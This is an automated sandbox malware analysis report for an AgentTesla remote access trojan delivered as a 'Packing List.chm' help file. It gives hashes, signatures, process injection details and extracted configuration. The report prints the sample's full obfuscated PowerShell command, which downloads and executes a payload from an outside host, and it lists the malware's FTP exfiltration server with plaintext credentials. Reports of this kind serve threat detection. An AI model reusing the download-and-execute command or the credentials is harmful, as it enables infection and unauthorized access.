Analysis
- max time kernel: 91s
- max time network: 144s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-10-2022 20:23
Static task: static1
Behavioral task: behavioral1
- Sample: fwdPacking List (8.76 KB).msg
- Resource: win10v2004-20220812-en
Behavioral task: behavioral2
- Sample: Packing List.chm
- Resource: win10v2004-20220812-en
General
- Target: Packing List.chm
- Size: 13KB
- MD5: 08cac56b75979c1f3bfc2e83e123a2fc
- SHA1: 56227c920783d547a673e0de919f438dba846c01
- SHA256: 11731e8a97c3ced6e50ffa011b04bc6b54cc5e4ee1ccf2c4fc70247b7ae4528b
- SHA512: 3be2746d1a0179642db2e7a85ba5cb4815e95582e56efb3e981755ecc50fc6590d425993bfb8f3685d3d79871ec88c597c545850929595c04abb60690169ac4b
- SSDEEP: 192:tyBAu4E8Y/p6efAPaiQ4nggjClAgLZkByk0GAN:tyauqYR8s4ggjCb5k0
Malware Config
Extracted
- https://mgcpakistan.com/yimu.txt
Extracted
- Protocol: ftp
- Host: ftp.onogost.com
- Port: 21
- Username: infoo@onogost.com
- Password: boygirl123456
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Blocklisted process makes network request (1 IoC)
  Processes: powershell.exe
    flow | pid | process
    13 | 4148 | powershell.exe
- Loads dropped DLL (1 IoC)
  Processes: powershell.exe
    pid | process
    4148 | powershell.exe
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Processes: aspnet_compiler.exe
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
    description | pid | process | target process
    PID 4148 set thread context of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, aspnet_compiler.exe
    pid | process
    4148 | powershell.exe
    4148 | powershell.exe
    2968 | aspnet_compiler.exe
    2968 | aspnet_compiler.exe
- Suspicious use of AdjustPrivilegeToken (44 IoCs)
  Processes: powershell.exe, aspnet_compiler.exe
    description | pid | process
    Token: SeDebugPrivilege | 4148 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 4148 | powershell.exe
    Token: SeSecurityPrivilege | 4148 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 4148 | powershell.exe
    Token: SeLoadDriverPrivilege | 4148 | powershell.exe
    Token: SeSystemProfilePrivilege | 4148 | powershell.exe
    Token: SeSystemtimePrivilege | 4148 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 4148 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 4148 | powershell.exe
    Token: SeCreatePagefilePrivilege | 4148 | powershell.exe
    Token: SeBackupPrivilege | 4148 | powershell.exe
    Token: SeRestorePrivilege | 4148 | powershell.exe
    Token: SeShutdownPrivilege | 4148 | powershell.exe
    Token: SeDebugPrivilege | 4148 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 4148 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 4148 | powershell.exe
    Token: SeUndockPrivilege | 4148 | powershell.exe
    Token: SeManageVolumePrivilege | 4148 | powershell.exe
    Token: 33 | 4148 | powershell.exe
    Token: 34 | 4148 | powershell.exe
    Token: 35 | 4148 | powershell.exe
    Token: 36 | 4148 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 4148 | powershell.exe
    Token: SeSecurityPrivilege | 4148 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 4148 | powershell.exe
    Token: SeLoadDriverPrivilege | 4148 | powershell.exe
    Token: SeSystemProfilePrivilege | 4148 | powershell.exe
    Token: SeSystemtimePrivilege | 4148 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 4148 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 4148 | powershell.exe
    Token: SeCreatePagefilePrivilege | 4148 | powershell.exe
    Token: SeBackupPrivilege | 4148 | powershell.exe
    Token: SeRestorePrivilege | 4148 | powershell.exe
    Token: SeShutdownPrivilege | 4148 | powershell.exe
    Token: SeDebugPrivilege | 4148 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 4148 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 4148 | powershell.exe
    Token: SeUndockPrivilege | 4148 | powershell.exe
    Token: SeManageVolumePrivilege | 4148 | powershell.exe
    Token: 33 | 4148 | powershell.exe
    Token: 34 | 4148 | powershell.exe
    Token: 35 | 4148 | powershell.exe
    Token: 36 | 4148 | powershell.exe
    Token: SeDebugPrivilege | 2968 | aspnet_compiler.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes: hh.exe
    pid | process
    4868 | hh.exe
    4868 | hh.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes: hh.exe, powershell.exe
    description | pid | process | target process
    PID 4868 wrote to memory of 4148 | 4868 | hh.exe | powershell.exe
    PID 4868 wrote to memory of 4148 | 4868 | hh.exe | powershell.exe
    PID 4148 wrote to memory of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
    PID 4148 wrote to memory of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
    PID 4148 wrote to memory of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
    PID 4148 wrote to memory of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
    PID 4148 wrote to memory of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
    PID 4148 wrote to memory of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
    PID 4148 wrote to memory of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
    PID 4148 wrote to memory of 2968 | 4148 | powershell.exe | aspnet_compiler.exe
- outlook_office_path (1 IoC)
  Processes: aspnet_compiler.exe
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
- outlook_win_path (1 IoC)
  Processes: aspnet_compiler.exe
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Processes
- (depth 1) C:\Windows\hh.exe
  Command line: "C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\Packing List.chm"
  Signatures:
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - (depth 2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://mgcpakistan.com/yimu.txt')|P
    Signatures:
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - (depth 3) C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      Signatures:
      - Accesses Microsoft Outlook profiles
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\73ab9a28-0688-49e7-b77d-eacdd07237df\AgileDotNetRT64.dll
  Filesize: 75KB
  MD5: 42b2c266e49a3acd346b91e3b0e638c0
  SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
  SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
  SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
- memory/2968-142-0x0000000005510000-0x0000000005AB4000-memory.dmp
  Filesize: 5.6MB
- memory/2968-143-0x0000000004E90000-0x0000000004F2C000-memory.dmp
  Filesize: 624KB
- memory/2968-147-0x0000000006850000-0x000000000685A000-memory.dmp
  Filesize: 40KB
- memory/2968-146-0x00000000068D0000-0x0000000006962000-memory.dmp
  Filesize: 584KB
- memory/2968-145-0x0000000006170000-0x00000000061C0000-memory.dmp
  Filesize: 320KB
- memory/2968-140-0x0000000000435A6E-mapping.dmp
- memory/2968-139-0x0000000000400000-0x000000000043A000-memory.dmp
  Filesize: 232KB
- memory/2968-144-0x0000000005AC0000-0x0000000005B26000-memory.dmp
  Filesize: 408KB
- memory/4148-138-0x00007FFA8C880000-0x00007FFA8C9CE000-memory.dmp
  Filesize: 1.3MB
- memory/4148-133-0x0000000000000000-mapping.dmp
- memory/4148-141-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmp
  Filesize: 10.8MB
- memory/4148-135-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmp
  Filesize: 10.8MB
- memory/4148-134-0x000002974F1D0000-0x000002974F1F2000-memory.dmp
  Filesize: 136KB
- memory/4148-136-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmp
  Filesize: 10.8MB